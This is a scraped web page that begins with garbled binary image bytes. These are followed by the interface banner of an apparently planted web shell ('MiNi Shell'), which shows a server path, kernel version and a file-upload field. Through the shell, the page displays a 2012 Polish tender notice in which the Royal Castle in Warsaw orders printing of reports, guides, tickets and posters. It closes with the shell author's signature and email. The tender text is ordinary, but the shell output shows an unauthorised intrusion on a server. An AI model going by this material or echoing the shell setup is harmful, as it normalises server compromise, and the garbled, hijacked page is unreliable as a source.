JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120326/93958-N-2012.html

<p class="kh_header"><b>Warszawa: Usługi poligraficzne</b><br>
<b>Numer ogłoszenia: 93958 - 2012; data zamieszczenia: 26.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zamek Królewski w Warszawie - Pomnik Historii i Kultury Narodowej , Plac  Zamkowy 4, 00-277 Warszawa, woj. mazowieckie, tel. 22 35 55 130, faks 22 35 55 127.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi poligraficzne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi poligraficzne polegające na wykonaniu składu, przygotowaniu form drukarskich, druku i dostarczeniu do siedziby Zamawiającego następujących publikacji:

1.	Raport Roczny 2011 r.
nakład 600 egz. 
objętość 60 str. 
format 210 x 297 mm  - A4
papier środki - kreda 150 g/m 
papier okładka - kreda 300 g/m 
kolor środków 4+4 
kolor okładki 4+0 + uszlachetnienie: folia matowa  jednostronnie
oprawa szyta i klejona 
okładka miękka, wysokości grzbietu okładki -  w przybliżeniu - 0,5 cm  
61 proofów cyfrowe w formacie A4
materiały w formie PDF-ów 
Periodyk z numerem ISSN

2.	Informator zamkowy, dot. ekspozycji na I piętrze, - obowiązujący od 1 maja 2012 r. do 30 września 2012 r., wersja polsko-angielska
nakład 35000 sztuk
format: 40,8 cm x 22,5 cm
falcowanie: 4 skrzydełka o wymiarach 10,2 cm x 22,5 cm
kolor:  (4+panton nr 195 C) + (4+panton nr 195 C) 
papier: kreda błyszcząca 170 g/m2
2 proofy cyfrowe  w formacie A4
materiały w formie PDF-ów + przekazana podstawa barwna w postaci 1 egz. edycji ubiegłorocznej

3.	Informator zamkowy, dot. ekspozycji na I piętrze, - obowiązujący od 1 października do 2012 r. do 30 kwietnia 2013 r., wersja polsko-angielska
nakład 35000 sztuk
format: 40,8 cm x 22,5 cm
falcowanie: 4 skrzydełka o wymiarach 10,2 cm x 22,5 cm
kolor:  (4+panton nr 195 C) + (4+panton nr 195 C)                             
papier: kreda błyszcząca 170 g/m2
2 proofy cyfrowe  w formacie A4
materiały w formie PDF-ów + przekazana podstawa barwna w postaci 1 egz. poprzedniej edycji

4.	Kronika Zamkowa nr 1-2/60-61/2011  
nakład:	 500 egz.
format:	 B5
objętość: 308 stron
kolor: środki 4+4 
kolor okładka: 4+0
papier środki: kreda błyszcząca 135 g/m2
papier okładka - kreda 275 g/m2   + uszlachetnienie: folia błyszcząca jednostronnie
oprawa: broszurowa, szyta i klejona
2 proofy cyfrowe  w formacie A4
materiały w formie PDF-ów
Periodyk z numerem ISSN

5.	Informatory o lekcjach muzealnych 2012/2013 dla szkół podstawowych,  ponadpodstawowych (gimnazjów i liceów), oferty edukacyjnej Pracowni Działań Muzealnych, oferty edukacyjnej Pracowni Działań Muzealnych dla Uniwersytetów Trzeciego Wieku
w nakładach odpowiednio 2200, 1600,1300 i 400 szt. - łączny nakład: 5500 egz. - 4 layoty:
format: A5,
kolor:4+4 środki, okładki 4+4,
średnia objętość każdego z pierwszych trzech zeszytów 48 stron + okładka 
i czwartego zeszytu 32 strony + okładka
papier: 
środki: kreda matowa 135 g/m2  
okładki miękkie: kreda 275 g/m2  + uszlachetnienie: folia matowa jednostronnie + lakier UV wybiórczo, jednostronnie
oprawa: klejona
50 proofów cyfrowe  w formacie A4
materiały w formie PDF-ów
Periodyki z numerami ISSN.

6.	bilety wstępu
nakład: 200.000 szt., 
format: podstawa 18 cm x  wysokość 7,6 cm; szerokość biletu z obustronną perforacją 180 mm, szerokość biletu bez bocznych perforacji 150 mm, szerokość bocznych perforacji po 15 mm z każdej strony, wysokość biletu 76 mm; bilety składane i perforowane
Druk: 4 + 2 kol.,
Papier: offset 80 g/m2, uwzględniający ogólne parametry ciągłego papieru (tzw. składanki) do drukarek EPSON FX - 880. Papier ciągły z perforacją umożliwiającą oddzielanie biletów (składanka dowolna) do drukarek Epson FX - 880 

UWAGA: 
Standardowy, kupowany w sklepach papier (składanka) jest często wykonywany w taki sposób, że wzdłużna perforacja (to, co ciągnie traktor drukarki) odrywa się od właściwego obszaru wydruku znacznie łatwiej niż poszczególne strony wydruku od siebie, co sprawia trudności przy próbie oderwania zadrukowanego biletu. Papier wykorzystany do druku biletów NIE MOŻE mieć tej wady. Odrywanie poszczególnych biletów wzdłuż perforacji rozdzielającej każdy bilet nie może uszkodzić bocznych perforacji.
 
materiały w formie PDF-ów.

7.	program koncertowy
nakład: 7 programów po 250 egz. (7 składów)
nakład w sumie: 1750 szt.,
format: 209 x 209 mm złożony na pół,
papier: karton ozdobny biały typu elfenbens 246 g/m2,
druk 1+1
skład w drukarni:
- przygotowanie projektu i przedłożenie do zatwierdzenia Zamawiającemu,
- wprowadzenie poprawek i zgłoszonych przez Zamek uwag do projektu,
- druk;

8.	afisz koncertowy
nakład 6 afiszy x 120 sztuk = 720 szt. (6 x skład)
format: B1
papier: biały offset 120 g/m2,
kolor 1+0
skład  drukarni:
- przygotowanie projektu i przedłożenie do zatwierdzenia Zamawiającemu,
- wprowadzenie poprawek i zgłoszonych przez Zamek uwag do projektu,
- druk.

9.	Przewodnik po Zamku, Andrzej Rottermund - wersja językowa polska
nakład 1500 egz.
format 210 x 297 
druk całość 4+4 
objętość 80 str. + okładka 
papier środki kreda błysk 135g 
papier okładka kreda błysk 300g 
uszlachetnienie okładki - Folia błysk
oprawa szyto-klejona 
4 proofy cyfrowe  w formacie A4
materiały w formie PDF- ów  + przekazana podstawa barwna w postaci 1 egz. poprzedniej edycji 
Publikacja z numerem ISBN

10.	Przewodnik po Zamku, Andrzej Rottermund - wersja językowa angielska
nakład 1500 egz.
format 210 x 297 
druk całość 4+4 
objętość 80 str. + okładka 
papier środki kreda błysk 135g 
papier okładka kreda błysk 300g 
uszlachetnienie okładki - Folia błysk
oprawa szyto-klejona 
4 proofy cyfrowe  w formacie A4
materiały w formie PDF- ów  + przekazana podstawa barwna w postaci 1 egz. poprzedniej edycji 
Publikacja z numerem ISBN

11.	Przewodnik dla dzieci po Zamku Królewskim w Warszawie pt. Zamek Królewski Jegomości i Rzeczypospolitej 
nakład:		3000 egz. 
format:		A4
objętość:		36 stron  środek + 4 strony okładka	
druk:		4+ 4
papier:		środek: kreda błyszcząca 135 g/m2
okładka: kreda błyszcząca 300 g/m + lakier UV
oprawa: zeszytowa - szyta drutem (2 zszywki)
materiały w formie PDF- ów  + przekazana podstawa barwna w postaci 1 egz. poprzedniej edycji 
Publikacja z numerem ISBN.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, iż w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał co najmniej po dwie usługi polegające na wydrukowaniu:
- afiszy lub plakatów,
- krótkich folderów informacyjnych, promocyjnych lub reklamowych, 
- publikacji o oprawie miękkiej szytej i klejonej,
- publikacji o oprawie zeszytowej (szytej drutem - zszywki).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, iż dysponuje  drukarnią znajdująca się w odległości do 150 km od siedziby Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, iż dysponuje  co najmniej jedną osobą posiadającą co najmniej 3-letnie doświadczenie w drukowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - staranność wykonania oprawy introligatorskiej - 10</li>
<li>3 - prawidłowość nałożenia folii na okładkę - 5</li>
<li>4 - staranność falcowania - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy w zakresie ustalonego wynagrodzenia w związku ze zmianą stawki VAT, w zakresie terminów wykonania i wielkości nakładu poszczególnych składników zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zamek-krolewski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie zamawiającego w Warszawie, plac Zamkowy 4, w Kancelarii Głównej (pok. Nr 208) - wejście z Bramy Senatorskiej..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.04.2012 godzina 11:00, miejsce: Oferty muszą zostać złożone w siedzibie zamawiającego w Warszawie, plac Zamkowy 4, w Kancelarii Głównej (pok. Nr 208) - wejście z Bramy Senatorskiej..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com